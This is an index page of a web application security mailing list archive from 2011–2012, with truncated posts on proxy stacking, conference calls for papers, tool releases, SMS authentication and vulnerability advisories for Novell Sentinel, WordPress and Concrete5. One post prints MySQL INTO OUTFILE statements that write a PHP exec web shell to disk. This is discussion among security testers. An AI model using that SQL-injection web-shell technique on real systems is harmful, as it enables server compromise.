Web Application Security Mode:
(Page 12 of 333)  < Prev  7 8 9 10 11 12 13 14 15 16 17  Next >
Re: stacking proxies 2012-01-02
Robert Hajime Lanning (robert lanning gmail com)
I am putting together: (in this order)Nginx (ssl)Varnish
(caching)Haproxy (load balancing/fail over)
On Dec 31, 2011 10:29 PM, "Robin Wood" <robin (at) digininja (dot) org [email concealed]> wrote:
> I watched Jason Haddix talk at BruCon and he talked about stacking
> proxy servers when doing web app tests so that you could g

[ more ]  [ reply ]
Re: stacking proxies 2012-01-01
Robin Wood (robin digininja org)
On 1 January 2012 11:24, BookBag <asaad2 (at) gmail (dot) com [email concealed]> wrote:
> I tunnel everything thru tor. But be careful as DNS requests sometimes are
> done thru your IP. So its best to get your ip's thru any proxy and do the
> tests thru tor after you've got your ip's

Most of my clients like to know where the a

[ more ]  [ reply ]
stacking proxies 2011-12-31
Robin Wood (robin digininja org)
I watched Jason Haddix talk at BruCon and he talked about stacking
proxy servers when doing web app tests so that you could get the best
out of each one.

I've been meaning to ask for a while, what proxies do people use when
stacking and in what order?


This list is sponsored by Cenzic

[ more ]  [ reply ]
Positive Hack Days 2012 - Call For Paper 2011-12-21
cfp (cfp phdays com)
Positive Hack Days 2012 - Call For Paper
30-31 May 2012 / Moscow / Russia

What comes to your mind when you think of Russia? Fyodor [Dostoevsky] and Moscow? Sputnik and bears? Vodka and matryoshkas? Or Russian hackers?

Positive Russian hackers, organizers of the Positive Hack

[ more ]  [ reply ]
Novell Sentinel Log Manager <= Path Traversal 2011-12-18
Andrea Fabrizi (andrea fabrizi gmail com)
Vuln: Path Traversal
Application: Sentinel Log Manager
Vendor: Novell
Version affected: <=
Website: http://www.novell.com/products/sentinel-log-manager/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi (at) gmail (dot) com [email concealed]
Web: http://ww

[ more ]  [ reply ]
SANS AppSec 2012 CFP reminder 2011-12-02
SANS AppSec CFP (callforpapers-appsec sans org)
Hi everyone,

It's been over a month since we first announced the CFP for the SANS
AppSec Summit being held in Las Vegas, Nevada on April 30 - May 1, 2012.

We've received a number of great submissions so far but there's only two
months left until the deadline on February 1, 2012. If you'd like to

[ more ]  [ reply ]
CanSecWest 2012 Mar 7-9; 2nd call for papers, closes next week, Monday. Dec 5 2011 2011-12-02
Dragos Ruiu (dr kyx net)
So after a dozen years or so organizing conferences, you
get the urge to pull levers and try experimenting with
things. So this year I sent out the CanSecWest CFP
only over Twitter, and G+ publicly. Just curious as to the
adoption and information dispersion rate, and some
estimate of the attent

[ more ]  [ reply ]
different ways to use INTO OUTFILE in MySQL 2011-11-25
Robin Wood (robin digininja org)
I've been talking to Miroslav (sqlmap developer) about the way he
creates files using INTO OUTFILE. He uses the following syntax:

select "" INTO OUTFILE "/tmp/x" LINES TERMINATED BY "<?php exec('ls');?>";

But I've always used:

select "<?php exec('ls');?>" INTO OUTFILE "/tmp/y";

Both end up wi

[ more ]  [ reply ]
CarolinaCon-8 (2012) Call for Papers/Presenters/Speakers 2011-11-21
Vic Vandal (vvandal well com)
CarolinaCon-8/2012 - Call for Papers/Presenters/Speakers

h4x0rs, InfoSec professionals, international spies, script kidz, and posers,

CarolinaCon-8 will occur on May 11th-13th 2012 in Raleigh NC (USA). We are now officially accepting speaker/paper/demo submissions for the event.

If you are s

[ more ]  [ reply ]
Understanding the four attack modes in Burp Intruder 2011-11-09
Robin Wood (robin digininja org)
Seeing as I have to think about which mode does what when using Burp
Intruder I decided to do a blog post about it to hopefully solidify it
in my mind and help anyone else who wasn't sure:



This list is sponsored by Cenzic

[ more ]  [ reply ]
New w3af release! (1.1) 2011-11-10
Andres Riancho (andres riancho gmail com)

Today we're releasing version 1.1 of w3af which includes the
following changes:

* Considerably increased performance by implementing gzip encoding
* Enhanced embedded bug report system using Trac's XMLRPC
* Fixed hundreds of bugs
* Fixed critical bug in au

[ more ]  [ reply ]
MSIS research 2011-11-10
Steve Sirag (stevesirag gmail com)

My name is Steve Sirag. I'm studying for my Master's of Science in
Information Systems (emphasis on security).

My final research project is to discover the limits corporate
networks place on social networking applications, and

how it compares to online and print discussions of the same.

[ more ]  [ reply ]
WordPress All Versions Full Path Disclosure (FPD) 2011-11-08
Ryan Dewhurst (ryandewhurst gmail com)

As part of my research on my tool WPScan, I have run the inspathx tool
against every version of WordPress released, excluding BETA and MU

The result is this tar file which contains a txt file for every
version of WordPress and the Full Path Disclosure vulnerabilities
which effect the

[ more ]  [ reply ]
Re: SMS protection 2011-10-29
Marcel Tudorache (marceltudorache yahoo com)
Hi Nick,

Thank you for your answer.
It would be interesting to know why do you think that it couldn't be used for online banking?

What I like about the SMSes as compared to the cryptografic tokens, is that you can receive the transaction details on your GSM which should be safer than via the email

[ more ]  [ reply ]
Re: outlook web access authentication 2011-10-26
Neil McAllister (neilmca2011 gmail com)

I think its critical to secure outward facing applications such as OWA, or
sharepoint! We used deepnet security dualshield to lock down all our IIS7
applications as well terminal services, rdp and vpn connections etc. I would
recommend deepnet security. Their dualshield platform will secure OWA,

[ more ]  [ reply ]
SANS AppSec 2012 CFP is Open 2011-10-26
SANS AppSec CFP (callforpapers-appsec sans org)
Hi everyone,

We're happy to announce that the sixth annual SANS AppSec Summit will be
held in Las Vegas, Nevada on April 30 - May 1, 2012.

The theme for this conference is "Application Security at Scale".

Billions of records in the cloud. Millions of smart mobile devices.
Millions of developers

[ more ]  [ reply ]
AppSec DC 2012 - Call for Trainers 2011-10-24
AppSec DC (cfp appsecdc org)

OWASP is currently soliciting training providers for the OWASP AppSec
DC 2012 regional conference that will take place at the Walter E.
Washington Convention Center (801 Mount Vernon Place NW Washington, DC
20001) on April 2nd through 5th of 2012.  The theme for this year's
conference i

[ more ]  [ reply ]
Agnitio Security Code Review Tool v2.1 released 2011-10-24
David Rook (david a rook gmail com)

I've released an update to Agnitio which I hope will help people
carryout security focused code reviews and find vulnerabilities in the
source code they are reviewing.

The major changes in v2.1 are listed below:

1) Windows x64 support

2) Automatically decompile Android .apk application to ea

[ more ]  [ reply ]
SMS protection 2011-10-21
Marcel Tudorache (marceltudorache yahoo com) (4 replies)

I was wondering how secure is an SMS to be used as authentication/transaction signing means for an application similar with online banking.

To make the analysis more targeted the following assumptions are made:
- I understand that the new smartphones can get viruses, but I would like to analy

[ more ]  [ reply ]
Re: SMS protection 2011-10-25
Fyodor (fygrave gmail com) (1 replies)
Re: SMS protection 2011-10-29
Marcel Tudorache (marceltudorache yahoo com)
Re: SMS protection 2011-10-25
Francois Yang (francois y gmail com)
RE: SMS protection 2011-10-25
Jesse Mundis (jesse voltage com)
Re: SMS protection 2011-10-25
Robin Wood (robin digininja org)
AppSec DC 2012 CFP is OPEN! 2011-10-12
AppSec DC (cfp appsecdc org)

Building on the success of AppSec DC 2010 and 2009, OWASP is pleased
to announce the next OWASP AppSec DC conference. The theme for this
year's conference is "OWASP - Not just webapps anymore" to reflect the
new and revised scope of OWASP to include all application security
issues inst

[ more ]  [ reply ]
Concrete5 <= SQL Injection and XSS Vulnerabilities 2011-10-04
Ryan Dewhurst (ryandewhurst gmail com)
# Exploit Title: Concrete5 <= SQL Injection and XSS Vulnerabilities
# Date: 2011-10-04
# Author: Ryan Dewhurst (ryandewhurst at gmail) (@ethicalhack3r)
# Software Link:
# Version: (tested)

[ more ]  [ reply ]
(Page 12 of 333)  < Prev  7 8 9 10 11 12 13 14 15 16 17  Next >


Privacy Statement
Copyright 2010, SecurityFocus